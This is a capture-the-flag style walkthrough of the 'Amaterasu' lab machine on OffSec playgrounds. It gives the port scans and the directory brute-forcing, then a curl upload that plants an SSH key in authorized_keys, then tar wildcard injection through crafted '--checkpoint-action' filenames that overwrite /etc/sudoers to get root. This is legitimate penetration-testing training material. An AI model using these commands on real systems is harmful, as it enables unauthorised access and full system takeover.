Amaterasu
Introduction#
In this writeup we are going to check out a machine available on the offsec playgrounds.
The idea here was to learn how to use curl and upload files that would ultimately help us into getting an initial foothold into the machine and then use the old tar wildcard to escalate our privileges.
Let’s learn.
Nmap#
sudo nmap -T4 -sVC 192.168.241.249 -oN nmap.txt -vv
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.45.214
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
Open port is 21 which has anonymous login, interesting. But then nothing really was happening in here and so I had to opt for another nmap scan, scanning for all open ports just to see if we can find some interesting things.
sudo nmap -p- 192.168.241.249 -vv
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 61
22/tcp closed ssh reset ttl 61
111/tcp closed rpcbind reset ttl 61
139/tcp closed netbios-ssn reset ttl 61
443/tcp closed https reset ttl 61
445/tcp closed microsoft-ds reset ttl 61
2049/tcp closed nfs reset ttl 61
10000/tcp closed snet-sensor-mgmt reset ttl 61
25022/tcp open unknown syn-ack ttl 61
33414/tcp open unknown syn-ack ttl 61
40080/tcp open unknown syn-ack ttl 61
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 649.31 seconds
Raw packets sent: 197008 (8.668MB) | Rcvd: 57238 (7.396MB)=
And we see that there were other open ports in here, but are unknown. So we can check for their banners and see what they have using nc -v {ip} {port}
.
Ideally we can also use whatweb to confirm others as well.
whatweb http://192.168.241.249:33414/
http://192.168.241.249:33414/ [404 Not Found] Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/2.2.3 Python/3.9.13], IP[192.168.241.249], Python[3.9.13], Title[404 Not Found], Werkzeug[2.2.3]
Interesting we find that there is a HTTP server running werkzeug on this port though it returns an error 404 we can do some directory brute forcing.
gobuster dir -u http://192.168.241.249:33414/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.241.249:33414/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/help (Status: 200) [Size: 137]
/info (Status: 200) [Size: 98]
We then come across two directories that we can look at.
We can see more commands in here maybe see what else we can do with the server.
We can see that we can list things in the system. There is also a file-upload which could mean that we can upload a file, file like a id_rsa in there that allows us to ssh into the machine, we can create our own ssh and upload it. We can use this to learn how to upload files on the system, curl_file_name
curl -F "file=@id_rsa.txt" -F "filename=/home/alfredo/.ssh/authorized_keys" -X POST http://192.168.241.249:33414/file-upload
We get a upload successful message, and then we can use ssh using id rsa to get into the machine with the ssh keys that we generated.
Now since port 22 was closed we can check what our other unknown ports had. Maybe we can get another thing on it.
->amaterasu nc -v 192.168.241.249 25022
192.168.241.249: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.241.249] 25022 (?) open
SSH-2.0-OpenSSH_8.6
Awesome we get one port that has a SSH connection, we can specify this port using -p
ssh -i id_rsa [email protected] -p 25022
Last login: Tue May 7 06:37:25 2024 from 192.168.45.214
-bash-5.1$
Privilege escalation#
We can then try and escalate our privileges, by first checking if there are any cronjobs running in the system. Lucky enough we find one.
We can then check it out and we see that it may seem like a totally safe script but in truth the *
command at the end makes it possible to leverage and create crafted filenames interprated as flags for tar.
Then under the tar man page we learn that we could execute commands via the ‘–checkpoint-action’ flag
--checkpoint-action=ACTION
Run ACTION on each checkpoint.
Next:
Create this files in the current directory
echo "echo 'alfredo ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > exploit.sh
echo "" > "--checkpoint-action=exec=sh exploit.sh"
echo "" > '--checkpoint=1'
This injects an entry into the sudoers
file that allows the user alfredo
use sudo without a password.
Now running sudo su
works like a charm and we are root.